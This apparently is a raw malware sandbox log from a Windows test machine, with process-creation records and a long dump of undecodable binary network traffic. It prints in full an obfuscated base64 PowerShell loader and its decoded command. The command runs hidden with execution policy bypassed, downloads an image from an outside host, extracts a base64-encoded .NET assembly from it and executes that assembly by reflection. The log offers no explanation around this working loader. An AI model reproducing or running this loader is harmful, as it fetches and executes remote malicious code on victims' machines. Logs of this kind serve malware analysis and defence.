gBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€WwBv€€GI€€agBl€€GM€€d€€Bb€€F0€€XQ€€g€€Cg€€JwBk€€Eg€€a€€€€w€€Ew€€bQBw€€Ho€€YQBI€€Fo€€bgBh€€Ec€€c€€€€0€€Fk€€agBR€€DI€€WgBY€€E4€€a€€BZ€€G0€€VgB1€€GE€€W€€Bw€€DE€€WQB5€€Dg€€M€€BO€€Ho€€RQB1€€E4€€egBN€€HU€€TgBE€€FU€€eQBM€€Go€€VQ€€0€€E0€€Uw€€4€€HY€€TwBu€€EI€€M€€Bk€€Ec€€Zw€€9€€Cc€€I€€€€s€€C€€€€JwBk€€GY€€Z€€Bm€€GQ€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZgBk€€GY€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZgBk€€GY€€Jw€€g€€Cw€€I€€€€n€€GQ€€YQBk€€HM€€YQ€€n€€C€€€€L€€€€g€€Cc€€Z€€Bl€€Cc€€I€€€€s€€C€€€€JwBj€€HU€€Jw€€p€€Ck€€';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x00000000000004d8
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: powershell
parameters: -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€aQBt€€GE€€ZwBl€€HU€€c€€Bs€€G8€€YQBk€€C4€€aQBv€€C8€€aQBi€€C8€€ZQBr€€Fc€€ZwBI€€Fc€€agBQ€€DM€€YQBy€€HY€€VQBx€€Dc€€Xw€€x€€DY€€OQ€€4€€DE€€Ng€€2€€D€€€€OQ€€3€€C4€€agBw€€Gc€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€WwBv€€GI€€agBl€€GM€€d€€Bb€€F0€€XQ€€g€€Cg€€JwBk€€Eg€€a€€€€w€€Ew€€bQBw€€Ho€€YQBI€€Fo€€bgBh€€Ec€€c€€€€0€€Fk€€agBR€€DI€€WgBY€€E4€€a€€BZ€€G0€€VgB1€€GE€€W€€Bw€€DE€€WQB5€€Dg€€M€€BO€€Ho€€RQB1€€E4€€egBN€€HU€€TgBE€€FU€€eQBM€€Go€€VQ€€0€€E0€€Uw€€4€€HY€€TwBu€€EI€€M€€Bk€€Ec€€Zw€€9€€Cc€€I€€€€s€€C€€€€JwBk€€GY€€Z€€Bm€€GQ€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZgBk€€GY€€Jw€€g€€Cw€€I€€€€n€€GQ€€ZgBk€€GY€€Jw€€g€€Cw€€I€€€€n€€GQ€€YQBk€€HM€€YQ€€n€€C€€€€L€€€€g€€Cc€€Z€€Bl€€Cc€€I€€€€s€€C€€€€JwBj€€HU€€Jw€€p€€Ck€€';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD
filepath: powershell
1 1 0

CreateProcessInternalW

thread_identifier: 3004
thread_handle: 0x00000000000003c4
process_identifier: 2964
current_directory: C:\Users\test22\Desktop
filepath:
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ekWgHWjP3arvUq7_1698166097.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LmpzaHZnaGp4YjQ2ZXNhYmVuaXp1Yy80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
filepath_r:
stack_pivoted: 0
creation_flags: 0 ()
inherit_handles: 1
process_handle: 0x0000000000000394
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received [
Data received We@¾‹ì)ÔV>æÛ¤ cJ›3âºuÞ7IDOWNGRD È çÛÖuÚéµÛ±³0Æs¼ueãM\ò0?ÝÀÿ 
Data received }
Data received K
Data received GA2Z ¬Ðª™$°Ñ²ß>ug}‘IwîÄj’y–ªÎà\¢1Î .ØÒÀž®™Bž@¼W;Q4^=Ãp6GàœÒ‡3ŠNYǞ¤³וèD{ƒ8!õ4dËHò´å"è³ íþÁBŠÂšûÁkÆr¡$¶<œ:Óó Šd9»eC¼ÊˆR`ø4•áÉ èošÛpCS×O‚R&ÃUªN³{ùàU]^NPˆt6©ª¸³~¤½tð«ÆQ°î9ç)´«"¨»p“涚4èSo٠Ӎì¸ÝöM!3Ì%óÿZal •¶ðeY«¢SùÜð_\Ìúû9.áðXcnn†1ª~ÅLϼ ½b•æþ˜U lÙKÅQÇ]‰PL­“Q•naóÕå+ï®LÑE\xó- A‡ ½¡ë杆Ï`
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received Üv”ZÇ£<´ã†è‹÷å]7;;8Ð+¦Ú Ÿ—˜r%œË<õ¼l)¤aÏ
Data received p
Data received  ·}Kf€þÄq–aܔUÍG{eà”°Ô ·Ö±´3„ä·8Τø9M¸EõÕoanyW ¼FrLf9hGׇ÷-\h>ï"ː±LG@››ëžÐ||½ ¹$&Wã)ܽK™×ÓÀG+54ùY/¢øT›O8×NÈÝ]ð:ôëÿÊh]ժ׆ãÚ5-»us}õÚm*B{üÙ±¼ì•Ëêù|tÓÒg“°“Ýͺ}¤æ×e,AÖãâcÑ6Aðv^®W„¹Ü’º–ë@@,¢©ÞÛlKçZ¿íFYíÓO_.“üúÉP#!j/ù^¹d7ª;*hŒ«¶Ñ@ýQÁÀ‘ÿö\C±u×»?I L*D~òMh‚1rh‡PrsGígðcRA;(úþ;ª˜2‚ðiþuß*Ñ ±4ûЧ´B^†je$.pŽ‚_@Ü <ñZ)é€M×*Å8ä\X „ôd{鱜õSusñÍïûxÛôÁ ôÖô9çÀ9ò±7zCÞ(Ñq¸çø.Eo€?#=#÷äô~þpEXüU¡ùD“°¶éumé6lý€ú®± ýù*÷åïü>¡œPaI Ö?~ÓS¼Ó@Øg/7t –ø¿¯%\|¶9·Ã_{á•–Êql0gsá ôFÊ-2Ü5l^"»B7MQ¨— °ZÏü;3-Ñ]ŒŒ„²ë)7s›Ùht Ø8ˆܔ/Úe`ªÞÆni—wû$rvó?ØõU¬ã¿[ Q,B¢¤ýÎì*ç‘úúQMȄü oHÝ8RŠ†¬¬ï§FWÈþbNËÀÎÁÓ2¦Ÿ&[Ø"¯5s}Lˆ$óOƒt 8œ+x:]wÇíµ¸¹˜Ð-;¡ƒJiËî@(ÿÅÊõ–¥Jþàíÿ #‚¤Ç'>¿‚õPq¯m}`¥×ù¶-ã!þçî\# ¿ÒR¿—X" (dšwâtà 9»áÿkjzB~}öf8G€n¬\yû¤Í©5þb¸ü÷Ã@Ë;´RßÃ"¬úÌê²)ýž¦ÆsOÚû5Ö¶÷Ÿã˜©›MÁ#¦žyD+ºüX6èxÊŸÔvþ¯`U;Ä¥Zº‚ä6é×à Œ%étÇNA$çKTeLsè¾ÅԔcø¼ß »ƒôkLº;‹ï]ׇÃæÀk!àIöýøÄj>nBÌ5 þ‘^ÝyßþÖRöK7Ɔ¨ŸÖwl£½w¹Ò;Wãií¶Š¾¢§_>ç>e$™‘ôKâ j¼SŒo2f©÷•#Ÿøh#x6.À«{R5¬/hiRaâj¡‚®B Râa*ò†ráQ÷&ÂZÒkKüŸlSg]1=¸ú…‚«©n“_Z Чð“Îj4_ïq VE}oÓJfŠ·\W+€þ„…Ïù nz=€FÍGÂü3£¯ °w6Y·Ù޳ƿƒ0ò™ÿÒ.ÝC)æy’¬HYć9šlìŠÕ;<™Žz&ã¦U_,%í•Lü&-ÜVÑþ ËãS)Z6 Íêñíß' þ ‚Tî1×^;Y>q<–/¤ Þ󺛅€8w­t~Ln5ÓF׎AŠÜ‰ ö4 )ÀZ?íP;þb%°Âê›lÄr¼¥%r“P®…Zý/ gçî·ó~Vúïi˾‰º— ²ëë-î;Ûè¡ÔöœàÍùk©`é̃Š0ß$ë5À¸Ä'6Ê6$”Íýï»j²6“U¼Ä;j‡H$ £lÖP'|íÞMˆÛáÐÀB©ÃAⱇ;.
Data received R'‚yˆ¤ào`Žà–é’‚Ö©‡Ìæ8]Àž\N!“ñdÚÆ­X8Ÿ`¢>õExYˆ~0+˜' ¯Fˆé̛àðMÁX B?K«ˆŸhrş¨äQ±Â<mìO,Ší‚zÐ>–.yQk"Ë Pk ù's §!åÞ&¹Îð9ë2Âqh_çªOµ‚¤j1ÔÛ=„cûÅ-<‰}È?s<}z:‘N»•2Þ÷Œfzâ{±;ϑR6nðEbËâQÈg9ƒ(Pí$= \”z’E-O˜2ąÃ}y.NòFø°œøØ2&áX­Š~å XÓ,A›ÙºaêÖ'ôAQÃIý»NåÆ4«ãb¨ˆÓt%DÕó}Q(õ®q—ùzyi~³K͚ˆ*ÀÇ B64 ôªuÈz”«]™– ´’u¶ÚÛ0Kæ¢ €§w ­š­9;<œ6lø‹­`(̽ҝŚ[\¸ÓÛ_Xì 7ZiÐEïëˆÎ²-™9Vô•^‚ö©úԍ†Q GæKƒÇ…=ÌðóåP–•”‘œDìÎÝZ'q­…3…¨UÆ櫏 Ä]ˆ ³Fn›§Åµ•‘Œ« égMÒCSx*&ݘ-jã¹ONÆ=ùvÇÙw®¯… €þ-6;•Á²®ªÅâš=*âXº<Çøä:úyò!îÕo rmŒª ßØüÇ5¯N¹;ô43*žë́p•Jç^Mƒ(ìýb‚Տ¸SƒË yk>éÅ£ïâdÃnCoðpÄ8ÞñAlZ¨îQqœ© Ûpê!t aI)h镒Ðp1³•S3»´p*þûŠt‹nó þpMŠ…xAR’¯#ӎìP››$Ç{€¨3[ö%›xyS‘Ïý[Õ¾4ªˆÅÔ,‘ì÷BZ$¨Ãÿ6•×Ãî ؑ>ÑûÜNsë3£ûYQV¨Óº’“‹ Ϣٞ”§wXC"IúÐOzÂ2 fáè¹ÜrzèÒM:;¨"{w7ù°£ù°Ñ&öqO‚ÓŒfãz«›˜ªëñZ…’mP¼†Å™¥Õpßو5x{ '–D´X%º+ZدÀcôK JÏý98Eu’Aхä[  ðó–î¿ßµÌ·Uç™,"JA¿Š‚§¶5í¬›%¦ÈÉõcé͆o5 d* Æâ”<J¾S®°ûxÖ}€k6d^0™ÔŒ•Ûå`®.KÕVoÀIköG [D¨f0¼Â,aL:Mµ@»C¸?qt7¯·²3’þDFô\À®à\•™›驶¦vh+ 8§„Ub¨HUîNoA°¶€ÃÈúSx¼þk[˜ñUʁiô&o¢Ѭê¥Mž{C­ÅÎðË^ɸ˜:¨’é%4¯ûл¬i‹¾ùc¬áƒô'¶»#ó[àŒË‚ácAˆË9ôLdŒê@BöÙë<ÛÑÃl§÷m4Úˆêgr­¥8, g¼ØCÍ<ã„ADüø—…0ãQÃÙЁö°, $±¾v÷›‚Œ>¾¹öòS®Ù=ö¢EOL:ò}ey Ã0‰ã}:Âþ®Hk¢T~ÎîXGõmb9g™ÉÜÑЊ²ôǝ Íß8•¯Øh^Zé; $íÉ9Fl¡ôlÞÉïgx o<jÂçìí¢ÙàsnGR]»æUˆ:VD B˜Ú–]›U"!髃>cYw™ÊiP§oÄDŽä.o0ý…¾•Mè3êá“dbO™«Ý<w͍•K/r9¸\¨8’¥¤
Data received x©8rðãÆM×·sŽˆ²°š©Zù™$èj¦6êxä øœ3ˆ­ ¼K¯ØPœ|bžÉ¡ÄÖ#‰÷ÍÁ,ϟ‚B ©ùÞÌÿȤCgÿ°ša ÅgõNûí&ÒêÌ)ÎÎ#Üt/zÝP_²lI~¦ öH ÂÞyDR¢ª ×´J]Ǥ÷z6Ù1"7„!${ -8ࡖ¤}ETi—íâú‚ œ[yŸï˜Qƒaê?.¨–t¥¾ìsŸ)h‡A6”㠍¦E½åçæ?vŽ Ì·…ŽV3̨è[¶LÔ±Ð$òLDJ|®µýR ô»UXãP`y…«ÿô€Aꦺ>½È2ؔ ¢kº¢FÈg.1Û;êSœ‘Ö£ôìÒË]ِ~£ÂÒ/º IÍMS¸âêBDÛd¨Ž ‰tÞÚÛø )WfàD)„eDK'ž7ë£%ö·¯œ8Ôö>®uv?–WT_ºß\ü?l"™Ì¼§¢üê^+úlP扎^«ðV¦)·Éhåÿ¤ÊPA×éŠÙ…ÙJëy4A˜z¾¼8ºt؈¢Ü:õç vŽá7ÿÍc!’óØB†%¬ÓKbŠüÔ#ŠhŸ®‹‘‚©•¾ˆpüï –fÀF_º­‘Þ–Ò‘äØs»*®' Xoö˜1̜E ÀzíÑéÚGkê¢ç™GC‚Ø»óáýÀ-É/#k!ØÓ>Ã&“}ÿôwÝÓú²#<;¼fE¸py½¨Š‰ú±àÈ£ô¯÷:¬ÂÙhpEÄÆf\$ ÷‘.x3NOHÝÓ¢ç<€x ,§2é5*Ä¥$ „\ 9¼¬ê­ÔÑ®³Ðqùq xÒPcÓïmxÓ=þíÃ7ڂ\bΩËÊÚ©@Ò£qx bF™7HÀ1Öí«–»Ò}Êì®Z.¦ÿ‹k0¨¾˜õy“È.w(b}D„ÇÐÚ'àòàǵ¬Åö869Áæxñ~,ãÃŒwÐÌ׋"–§ëô/íQÚr4Ã<iB´®Þ1eGDv9Äwú³ãŸYi•JtœÝ–f“[?6åÿ†¬· l…q©ýAáT2)Zp«ÚýÑ0¸Lü-:˜ø[kXpL¤äŽ±I§P6Úà릘‰Å«M"°c]VËl"ÙKŒž§_×.wï±bñX‰°M¹°¤Š¬kÙ¯)Zµ1ñí3Ç{••Õ-x=aS¸‡‹‘(§í—*k¨r:êaBbÇ13Z’xíúLH‚ûTÝåžy1Gq¸¾¡\óTןGµÆ1Òò3uÝ廥Æ*¹¯—ôj¦ìjìõmÇõðˆ:ÁQøï†Ã“¼È,ß`¾u¾¸XOöÆõÀª{·YZ–þXú˜¾¦U×FaÀýt±ÛñúÓÂãàåƒ{³Xë[¦B7Vö^ýY~32VóÄò¢ ;ž‰ù¤Á‘Ëeäç:”r×›ÆÉé±´c5ž;ù–rҒðZõ\÷öXÉՂ^\W¬5á¼éÄ·7+S÷Ž$›`Ï÷ûĈm•„¤ vGi nÑc±,üää&®ÖZtÿÚ'ô¬ÎÚd/2µ 'í[½Ÿ3ŸòOP–6GwåiCíßo6ú6æÞÖ_wùñ#bî-E£H×Épšãù¾ÌPñú‚ï,){ &œm Ä°¼}gC¸cEÿ»&ÎÔqŠ¿™ðûlŸ @è߃†t­Nth¼·۝ÄDÁìÁƒ.j­¾øL®åÔ÷ °ŠzßÑڝ®Aǎ Ëø؛9¿Ö—‹C¬t!%H›ÀXÕÁýáéMnHX~ha
Data received ØÍO9¥ãÌÐZ¢º«eµÇ×Eë(bpþq’,üéX–‰´/ó( ‡6éQÛsf+˜“ÿr@˜kœúæ¾Ô¤@ ÙÄ~zj)×cì¨~þêæŸf¢Ã¶º>:ó«óÅ,·W§›’RÇ«0·,œ]ÆCTw!_á1e+[Ü0–¡Þ܏ȳªSoe_4QRÞ/±ñ“Û;®‚ð¶ÝÎm €àsåÒé0å Ô¢ÎM†Ezh»Ü‰,Û:ŠÖㅸºþ朡-Ç %×´@ôÿ9ëb$›Nª]Np¶EÁ Í? ÌBÈxÿyh—}À¾lýðañøóá06?cÁ‰L=Î"Ï[å·¶m-z‘²\1«¢ Ìÿ(ݫ˛ðúøF²m¿77LÃlæ¼ê§Œ™½…][oÞ-¨fU‰ä,páè`·¨Û¸ùªàõÞ ›£EÐ3&Š¹xz‘ÿkØî!NIn̳ØfY4s•:Áyà+Ãà º¥ÏpuyTEfygžÄV|PÆôò=¨>¸›ÚªÍ:8ÿ£ë>&ÉDD¢·¹"0EçO ¡j⫝č‡}_꺱þýOÖoc¾`1E=©‘ÇtÜƶ ê>ݨDíœsp«Wdê>@ze¹ŸÆ¹nÒShe¦/#N:'¨ 3*~ì4”3Šm“$]_1ÀËuq¯(0P ‘Ä­vú±…ÐÉ !0Š’p9`Ø]¶%š¤?ㆁzkái2 TteÉö›5£xšˆ#i9>öW³-̹2Hûßèf³È•‡&Ï.aåÇýâMåný`֙)Ì3™©<pN]©+ »¤ç.ÇJ{äÜ* <oí­-Fƒ+àò@òÓ6Ÿ§ÙW®ÍظqüÛÓ·Ø{±³m!Ú?‰+ñ•sõñÁ“ÑpÎ$¿šß0‡šé©\ï­{®|üárAÅÐÊÔÞW(J==º°ïŠŠñ‘°R‡¸¸µC'1œ ßVAHÞ®…ÚÑYov<šàÿ}êð²²0 öM·ñòJ`œ±cXéçÞ¢0m§ÙªÓE'wgQ/Ô#õ†íOÆÅãõªÿýàß¾©—vø™ÐÕÂ~˜ž?“SÉsñ¬ÀËU4³ù€¿½+ŽÃaD«µBíÄîòɲ<’ca 㵒¢e¸˜¿/-D¬ŠëºÅBßnê?ã'ž#åìöH—lÂH–*T?Ü~ˆLã# ‹ö ÏA—€ì¸—_ îé§æ•ú÷õ$˜˜©+¨Ä;ƒ}]ÀÓÁÊÊá*L ¿áÙk±[+CÆ~•}mnS(ϜrÅê|aðYXq^݅Íł¶:9«gdXÙ)4M*qŠž™$'Âát ¿M+© Ÿíµ¿¹Äº Xƒj}KÏ`‡!üIsˆ÷Ìí0`ÍÕï2p÷Gu‹$s@•ã ¿#÷ 3>M·QY|aáÚâøþ:H{7©… TõªŸU¯ôÇÂJutsŸ6@HáQ·§'Rÿ0Dá53\ ú¶¥A}ªþå&L»Àâ³ÛÅh_ìª<½Ýđ+óėç +øVÖ8§’lýžü-ª©S1±v÷  öÛj >Õuiíùó¼ÝÚ3VDœÄ%? N ¨@ïR0ƒè»9`ͥⵥª`I £ÜOX.®N;˜kŠâ¿úŸBÏúƒÃt"´Kiµ(†˜G‰}ûL ›W„J;°Æó‰H "Õluü’úš\'i3O¢d´Òfšä³¶¬2Ýh@ÄÈ ­if¦ÓQ×LÖ:\¢nBL’FlñL@†CÁZ{
Data received «}ÞÓ j7ï:y²l¾·$®žo8»\&6¶sæÕà TÕÚqVµÃ¤ Ù ò³zïw`†C‡—bá¨'ûÊ3ž<×®7~¤M:¡´ G¿Ë´k”Üù7Ò*fVSÓ(h`™¶äú@õ¡2F³ØÀ:“Â^Fu|…”"ï°÷âê$*ò›n…ø¦&k­Ål«wÑ¿O—S Ô 5úµ3j£4Ùúì¦öV:Àu¡¼eãåÖj‰!:ÿ¶“·^y\d¡þ‘ €,LޕÇæZXÄw^&’hŸï t±syâ\SÜó±;—“ŠiŠQ<˜•"Ú´µqgðªW“<x:Ǫ>6È¿–ƒ Ý$݅aÑ´hì8¼Zº–sÌEâÌIWßy©C;Óë„y£ñn%.õ® üðDûgÄãR)ýáé÷䛭¡³f–ÿœ¸ŒÑètAP뺦´ñ¥3\ÔÍFšÍP³ƒRßÌkµÛ²¯àJè‹K•Ò<tÚ°§!hL`›Ôi¾ 5Õ\þXóMÙþR7Rè¤v–PT ortüÝ°“-gÄ *Pµ0b¢7՞›aû]Di„‘ÔÃe¯à§ØV º›cC,5Ð×2°^)”xó,Ê©k‘˜]¢n<¤Æn؅‘ö¼í˜ó³-x̛&‰AøÇXLÒ¼BtrŸóüªŠÕsÙÉKûÀþOø4P€úG$™©¡ÔjFJõÙ %Çö•YJՑöOt! ¯\›€Öê±z3×´7ÉO ’Y™ö9ñƙ~y[‹u+`%¨:À <–þ nç¿E=[TWÎ>``›‚Ò‹P¯¤tFÐëçjŒr'´$%1ü7×۽ő4KhÈÍ¢WftrÏÝíGðxÒ®ËÉM¦R¾0§+í>uàœ[À­qwkú? Ê/>͐oœàGôé㗍V+b€©Hqè¹À(ӂÊLœí{Y–ÜÂ<ZfY_yØJ*]Pi{ž¢ÑM5~Jbãɚ¡¥µèS˜L=U÷95¢%ÊULۓ(³Á „†=ùÄ.Þ1 z)áßgËBÍWì†/heÝ¡O¿œÎ0:]¸¦¡Î Fó‘bÐ`øK×ïLüêïç ¡ Ù„‘…3Ú°#„EF²ÇÖ'eÝÇ°’Ó¥C¤»žu萉”%tEGÿT²ÔðÊx2Q ezVqïBÞ¬Y¡56G²¡u(`ýŠâ¶´:ܪ­›«:×/ÙJìCÓÐAâà} 